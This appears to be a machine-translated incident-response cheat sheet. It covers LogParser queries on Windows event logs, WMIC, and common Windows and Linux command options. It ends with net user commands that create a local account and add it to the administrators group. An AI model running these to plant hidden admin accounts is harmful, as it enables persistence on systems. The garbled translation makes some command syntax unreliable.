Logprase
download link:
https://www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=24659
use
Security Log
The main administrator login to view the normal time period if
the Trojans run time whether the administrator login time and correspondence
1
|
LogParser -i:EVT -o DATAGRID "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings,8,'|') as LogonType, EXTRACT_TOKEN(Strings,17,'|') as ProcessName, EXTRACT_TOKEN(Strings,18,'|') as SourceIP FROM Security where EventID=4624 AND TO_DATE(TimeGenerated) BETWEEN TIMESTAMP('2019-05-30','yyyy-MM-dd') and TIMESTAMP('2019-05-31','yyyy-MM-dd')"
|
System Log
The main view the service name, service path
1
|
LogParser -i:EVT -o:DATAGRID "SELECT TimeWritten,EventID,EventType,EventTypeName,SourceName,EXTRACT_TOKEN(Strings,0,'|') as service_name,EXTRACT_TOKEN(Strings,1,'|') as service_path,Message from system WHERE TO_DATE(TimeGenerated) BETWEEN TIMESTAMP('2019-05-30','yyyy-MM-dd') AND TIMESTAMP('2019-05-31','yyyy-MM-dd')"
|
Application Log
The main viewing program run time
1
|
LogParser -i:EVT -o:DATAGRID "SELECT * FROM Application WHERE TO_DATE(TimeGenerated) BETWEEN TIMESTAMP('2019-05-30','yyyy-MM-dd') AND TIMESTAMP('2019-05-31','yyyy-MM-dd')"
|
WMIC
View command line parameters process
1 2 3 4 5 6 7
|
Process GET Caption WMIC, the CommandLine / value> tmp.txt WMIC the Brief Service List WMIC Process List the Brief WMIC the Startup List the Brief // Check to install the patch and the time information WMIC QFE WMIC QFE GET Caption, the Description, the HotFixID, InstalledOn
|
DOS command
to you
1 2 3 4 5 6 7 8
|
DIR [drive:] [path] [filename] [/ A [[:] attributes]] [/ B] [/ C] [/ D] [/ L] [/ N] [/ O [[:] sortorder] ] [/ P] [/ Q] [/ R & lt] [/ S] [/ T [[:] TimeField]] [/ W is] [/ X-] [/. 4] / a exhibits a specified attribute file attributes: D R H directory read-only file a hidden file ready for archiving S file system I no content index file analysis point L - indicates "NO", the prefix / S display the specified directory and subdirectory / W with a wide format display list / P display a full-screen pause, press any key to continue to display the next screen / Q to display the file owner
|
copy and xcopy
copy only copy files, not copy the folder
xcopy can copy folders and files
1 2 3 4 5
|
xcopy parameter / S Copies directories and subdirectories except empty directory / E Copies directories and subdirectories, including empty directories / C ignore the error continues to copy / H Copies hidden and system files
|
del、deltree、rd
del can only delete one or more files, folders can not be deleted
deltree is an external command, you can delete files and folders, as well as its sub-folders
rd delete empty folders, you need the absolute path to an empty folder
1 2 3
|
del parameter / s recursive delete folders and file / q are not prompted to confirm the deletion
|
move
Moving one or more files
1 2
|
/ Y have the same name if the files in the destination folder, ignore the prompt, overwrite the original file directly / -Y WARNING
|
attrib
Change the file attributes
1 2 3 4 5 6 7
|
Parameter attrib + setting properties - Delete Attribute R Read-only files A archive S System files H hidden files
|
netstat
View network connections, port information
1 2 3 4 5 6 7 8 9 10 11 12 13
|
The NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-R & lt] [-s] [-t] [-v] [interval The] -a display connector and listening port -b included in the display to create a connection or listening port of each executable components; required permissions -e displays Ethernet statistics -n display in digital form address and port number -o display ID associated with each connection belongs processes -p proto specified protocol shows the connection; can be TCP, UDP, TCPv6, UDPv6 -r displays the routing table -s to display statistics by protocol -t displays the current connection unloaded state -x display NetworkDirect connect, listen, and share endpoints -y show all connections TCP connection template; can not be combined with other options to use the number of seconds interval to re-display the selected statistics, each display pause between. Press CTRL + C to stop re-display statistics.
|
Linux is netstat
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
|
usage: netstat [-vWeenNcCF] [<Af>] -r netstat {-V|--version|-h|--help} netstat [-vWnNcaeol] [<Socket> ...] netstat { [-vWeenNac] -i | [-cnNe] -M | -s [-6tuw] }
-r, --route display routing table -i, --interfaces display interface table -g, --groups display multicast group memberships -s, --statistics display networking statistics (like SNMP) -M, --masquerade display masqueraded connections
-v, --verbose be verbose -W, --wide don't truncate IP addresses -n, --numeric don't resolve names --numeric-hosts don't resolve host names --numeric-ports don't resolve port names --numeric-users don't resolve user names -N, --symbolic resolve hardware names -e, --extend display other/more information -p, --programs display PID/Program name for sockets -o, --timers display timers -c, --continuous continuous listing
-l, --listening display listening server sockets -a, --all display all sockets (default: connected) -F, --fib display Forwarding Information Base (default) -C, --cache display routing cache instead of FIB -Z, --context display SELinux security context for sockets
<Socket>={-t|--tcp} {-u|--udp} {-U|--udplite} {-S|--sctp} {-w|--raw} {-x|--unix} --ax25 --ipx --netrom <AF>=Use '-6|-4' or '-A <af>' or '--<af>'; default: inet List of possible address families (which support routing): inet (DARPA Internet) inet6 (IPv6) ax25 (AMPR AX.25) netrom (AMPR NET/ROM) ipx (Novell IPX) ddp (Appletalk DDP) x25 (CCITT X.25)
|
用户操作
1 2 3 4 5
|
net user chessur password /add net localgroup administrators chessur /add net user chessur /active:yes net user chessur /actice:no net user chessur /del |